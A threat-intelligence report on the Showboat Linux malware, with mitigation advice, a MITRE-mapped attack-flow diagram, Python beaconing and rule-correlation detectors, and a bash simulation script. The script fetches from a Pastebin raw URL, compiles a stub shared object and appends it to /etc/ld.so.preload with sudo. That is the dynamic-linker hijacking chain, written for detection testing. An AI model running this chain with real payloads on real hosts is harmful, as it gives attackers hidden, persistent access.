SOC Prime Bias: High

19 Jun 2026 07:48 UTC

Showboat Malware Targets Middle East Telecom Firms Since 2022

SOC Prime Team

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Summary

Showboat is a modular Linux post-exploitation framework built for AMD x86-64 environments. Active since mid-2022, it is designed to maintain quiet, long-term access inside compromised networks. The malware uses advanced evasion methods, including XOR encryption and abuse of the dynamic linker to conceal malicious processes.

Investigation

The investigation traced the command-and-control infrastructure to Chengdu, China, which, together with the observed tactics, techniques, and procedures, suggests links to PRC-aligned threat actors. Technical analysis showed the malware relies on a hardcoded XOR key to decrypt its configuration and abuses ld.so.preload to achieve stealth on infected systems.

Mitigation

Defenders should watch for unauthorized changes to /etc/ld.so.preload and suspicious use of the gcc compiler on production Linux hosts. It is also recommended to deploy network monitoring capable of identifying beaconing behavior, even when timing is randomized, and to use integrity monitoring for critical system libraries.
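As an added example that is not part of the SOC Prime report, the Python script below shows one way to pick out the jittered heartbeat beaconing this section describes: it groups outbound connections per source/destination pair from a constructed connection log and flags pairs whose inter-arrival times cluster tightly around a median, which still holds when the sleep interval is randomized. The log format, addresses, the MAD/median ratio and the thresholds are all assumptions made for the example.

```python
import re
from collections import defaultdict
from statistics import median

# Constructed connection-log format: one outbound flow per line (assumed, not a real sensor format)
LINE_RE = re.compile(r"ts=(?P<ts>\d+) src=(?P<src>\S+) dst=(?P<dst>\S+)")

# Constructed sample flows: (src, dst, first timestamp, inter-arrival gaps in seconds)
SAMPLE_FLOWS = [
    # heartbeat with a 60 s base interval, sleep randomized by roughly +/-15 s
    ("10.0.0.5", "203.0.113.10:443", 1781164080, [60, 52, 71, 48, 66, 58, 73, 50, 64, 55]),
    # interactive browsing: irregular gaps spanning seconds to minutes
    ("10.0.0.7", "198.51.100.20:443", 1781164080, [3, 120, 7, 900, 2, 45, 1, 300, 15, 60]),
    # periodic, but too few connections to call it a beacon
    ("10.0.0.9", "192.0.2.30:443", 1781164080, [30, 31, 29]),
]


def make_log(flows):
    """Expand (src, dst, start, gaps) tuples into constructed log lines."""
    lines = []
    for src, dst, start, gaps in flows:
        ts = start
        lines.append(f"ts={ts} src={src} dst={dst}")
        for gap in gaps:
            ts += gap
            lines.append(f"ts={ts} src={src} dst={dst}")
    return lines


def parse_log(lines):
    """Collect connection timestamps per (src, dst) pair."""
    per_pair = defaultdict(list)
    for line in lines:
        m = LINE_RE.search(line)
        if m:
            per_pair[(m["src"], m["dst"])].append(int(m["ts"]))
    return per_pair


def gap_stats(timestamps):
    """Median inter-arrival gap and the MAD/median ratio.

    The ratio is a robust measure of timing regularity: a fixed sleep gives 0,
    a sleep randomized by +/-25% stays well below 0.3, while human-driven
    traffic is far more dispersed. Returns None for fewer than two connections
    or a zero median gap.
    """
    ts = sorted(timestamps)
    gaps = [b - a for a, b in zip(ts, ts[1:])]
    if not gaps:
        return None
    med = median(gaps)
    if med <= 0:
        return None
    mad = median(abs(g - med) for g in gaps)
    return med, mad / med


def find_beacons(lines, min_connections=8, max_jitter_ratio=0.3):
    """Return (src, dst, median_gap_seconds, jitter_ratio) for beacon-like pairs."""
    hits = []
    for (src, dst), stamps in parse_log(lines).items():
        if len(stamps) < min_connections:
            continue
        stats = gap_stats(stamps)
        if stats is None:
            continue
        med, ratio = stats
        if ratio <= max_jitter_ratio:
            hits.append((src, dst, med, round(ratio, 3)))
    return hits


if __name__ == "__main__":
    for hit in find_beacons(make_log(SAMPLE_FLOWS)):
        print("beacon candidate:", hit)
```

The median and median absolute deviation are used instead of mean and standard deviation so that a handful of long gaps (a host asleep, a dropped connection) do not mask an otherwise regular cadence; in production the per-pair grouping would normally also key on the destination port and be computed over a sliding window.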

Response

If Showboat activity is detected, isolate the affected Linux systems from the network immediately to stop further command-and-control traffic. Perform memory forensics to identify injected shared objects and carry out a full audit of system settings and scheduled tasks to confirm that all persistence mechanisms have been removed.

Attack Flow

    graph TB
        %% Class Definitions Section
        classDef action fill:#99ccff
        classDef builtin fill:#cccccc
        classDef malware_entity fill:#ff9999
        classDef network fill:#99ff99

        %% Node Definitions
        %% Stage 1: Initial Configuration
        action_decryption["<b>Action</b> – <b>T1027: Obfuscated Files or Information</b><br/>Retrieves encrypted configuration via XOR<br/>using hardcoded key: look me, AV!<br/>Target: telecom.webredirect[.]org"]
        class action_decryption action

        %% Stage 2: C2 and Exfiltration
        malware_showboat["<b>Malware</b> – <b>Showboat</b><br/>Post-exploitation lifecycle agent"]
        class malware_showboat malware_entity
        action_beaconing["<b>Action</b> – <b>T1071: Application Layer Protocol</b><br/>Establishes C2 via heartbeat beacons<br/>Uses randomized sleep intervals to evade detection"]
        class action_beaconing action
        action_exfiltration["<b>Action</b> – <b>T1029: Scheduled Transfer</b><br/>Bundles host info and screenshots into JSON<br/>Encrypts and Base64 encodes data<br/>Uses steganography in PNG fields for evasion"]
        class action_exfiltration action

        %% Stage 3: Stealth and Persistence
        action_fetch_source["<b>Action</b> – <b>T1105: Ingress Tool Transfer</b><br/>Fetches C source file ukpkmkk.c<br/>Source: Pastebin URL"]
        class action_fetch_source action
        action_compile["<b>Action</b> – <b>T1059: Command and Scripting Interpreter</b><br/>Compiles ukpkmkk.c locally on victim machine<br/>Generates malicious shared library"]
        class action_compile action
        action_hijack["<b>Action</b> – <b>T1574.006: Hijack Execution Flow: Dynamic Linker Hijacking</b><br/>Uses ld.so.preload mechanism<br/>Injects /tmp/ukpkmkk.so into processes"]
        class action_hijack action
        action_stealth["<b>Action</b> – <b>T1564: Hide Artifacts</b><br/>Hooks system calls like readdir()<br/>Hides processes from ps and top using filter list"]
        class action_stealth action

        %% Connections
        malware_showboat -->|executes| action_decryption
        action_decryption -->|establishes| action_beaconing
        action_beaconing -->|exfiltrates_data| action_exfiltration
        action_exfiltration -->|triggers_hide_command| action_fetch_source
        action_fetch_source -->|leads_to| action_compile
        action_compile -->|produces_library| action_hijack
        action_hijack -->|achieves| action_stealth
        %% Final mapping of the flow
        action_stealth -.->|maintains| malware_showboat

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre-flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic. Abstract or unrelated examples will lead to misdiagnosis.

  • Attack Narrative & Commands: The attacker aims to establish persistent interception of system calls. They begin by downloading a malicious C source file from a Pastebin raw URL using curl. Once downloaded, they use gcc with the -shared and -fPIC flags to compile the source into a shared object file named malicious.so. Finally, they attempt to achieve persistence by appending the path of this library to /etc/ld.so.preload. This sequence is designed to inject the malicious library into every process on the system.

  • Regression Test Script:

    #!/bin/bash
    # Simulation of Showboat Malware TTPs
    
    # 1. Simulate fetching C source from Pastebin
    # This command triggers the 'selection_fetch' part of the rule. The placeholder
    # paste id serves no usable source, so the download is written to a scratch file
    # and a harmless stub (empty constructor) is compiled in its place
    echo "Simulating pastebin download..."
    curl -s https://pastebin.com/raw/example_id -o /tmp/pastebin_download.c || true
    echo 'void __attribute__((constructor)) init(void) {}' > fake_malware.c
    
    # 2. Simulate compilation of a shared object
    # This command triggers the 'selection_compile' part of the rule
    # (selection_fetch AND selection_compile)
    # Abort if the build fails: appending a missing library to ld.so.preload would
    # make the dynamic linker print an error for every process started afterwards
    gcc -shared -fPIC -o /tmp/malicious.so fake_malware.c || { echo "compile failed"; exit 1; }
    
    # 3. Simulate ld.so.preload modification
    # This command triggers the 'selection_preload' part of the rule
    # The stub's constructor does nothing, so preloading it changes no process behaviour
    echo "/tmp/malicious.so" | sudo tee -a /etc/ld.so.preload
    
    echo "Simulation complete. Check SIEM for alerts."
  • Cleanup Commands:

    #!/bin/bash
    # Cleanup simulation artifacts
    
    # Remove the entry from ld.so.preload first (requires caution): every new process
    # reads this file, so the line must go before the library it names is deleted,
    # otherwise each process start logs a preload error until the file is fixed.
    # The sed address uses | as its delimiter because the path itself contains slashes
    sudo sed -i '\|/tmp/malicious.so|d' /etc/ld.so.preload
    
    # Remove the malicious library, the source stub and the scratch download
    sudo rm -f /tmp/malicious.so
    rm -f fake_malware.c /tmp/pastebin_download.c
    
    echo "Cleanup complete."
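To show how the three rule selections named in the simulation script (selection_fetch, selection_compile, selection_preload) can be expressed and correlated, here is an added Python example that is not part of the SOC Prime rule or report. It runs the selections over constructed JSON-lines process-creation events, raises a high-severity alert when one host shows all three within a time window, and a medium-severity alert for any ld.so.preload modification seen on its own, matching the Mitigation advice to watch that file regardless. The event field names, hostnames, window length and severities are assumptions.

```python
import json
from collections import defaultdict

# Correlation window: all three stages must fall within this many seconds on one host (assumed)
WINDOW_SECONDS = 3600

# Constructed process-creation telemetry as JSON lines (field names are an assumption)
SAMPLE_EVENTS = "\n".join([
    # web01 runs the full chain: pastebin fetch, shared-object build, ld.so.preload append
    '{"host":"web01","ts":1781164100,"image":"/usr/bin/curl","cmdline":"curl -s https://pastebin.com/raw/example_id -o fake_malware.c"}',
    '{"host":"web01","ts":1781164130,"image":"/usr/bin/gcc","cmdline":"gcc -shared -fPIC -o /tmp/malicious.so fake_malware.c"}',
    '{"host":"web01","ts":1781164160,"image":"/usr/bin/tee","cmdline":"tee -a /etc/ld.so.preload"}',
    # build02 compiles shared objects as part of normal work and fetches nothing from pastebin
    '{"host":"build02","ts":1781164200,"image":"/usr/bin/gcc","cmdline":"gcc -shared -fPIC -o libfoo.so foo.c"}',
    # db03 only touches ld.so.preload, e.g. a configuration-management run
    '{"host":"db03","ts":1781164300,"image":"/usr/bin/tee","cmdline":"tee /etc/ld.so.preload"}',
])


def basename(path):
    return path.rsplit("/", 1)[-1]


def selection_fetch(ev):
    """Download tool pulling a raw paste."""
    return basename(ev["image"]) in {"curl", "wget"} and "pastebin.com/raw" in ev["cmdline"]


def selection_compile(ev):
    """Compiler invoked to produce a shared object."""
    return basename(ev["image"]) in {"gcc", "cc", "clang"} and "-shared" in ev["cmdline"].split()


def selection_preload(ev):
    """Any command line that names the dynamic linker preload file."""
    return "/etc/ld.so.preload" in ev["cmdline"]


SELECTIONS = {
    "selection_fetch": selection_fetch,
    "selection_compile": selection_compile,
    "selection_preload": selection_preload,
}


def detect(jsonl_text, window=WINDOW_SECONDS):
    """Return (host, severity, reason) alerts derived from the events."""
    seen = defaultdict(lambda: defaultdict(list))  # host -> selection name -> [ts]
    for line in jsonl_text.splitlines():
        ev = json.loads(line)
        for name, matches in SELECTIONS.items():
            if matches(ev):
                seen[ev["host"]][name].append(ev["ts"])

    alerts = []
    for host, hits in seen.items():
        if all(name in hits for name in SELECTIONS):
            # earliest and latest matching event on this host across all three selections
            first = min(min(ts) for ts in hits.values())
            last = max(max(ts) for ts in hits.values())
            if last - first <= window:
                alerts.append((host, "high", "pastebin fetch, shared-object build and ld.so.preload write"))
                continue
        if "selection_preload" in hits:
            alerts.append((host, "medium", "ld.so.preload modified"))
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

The compile selection alone is deliberately silent (build02 produces nothing) because shared-object builds are routine on developer and CI hosts; what makes the chain suspicious is the combination with a paste-site download and a write to ld.so.preload on the same host. A file-integrity event on /etc/ld.so.preload from the FIM tooling mentioned in the Mitigation section would slot in as a second source for selection_preload.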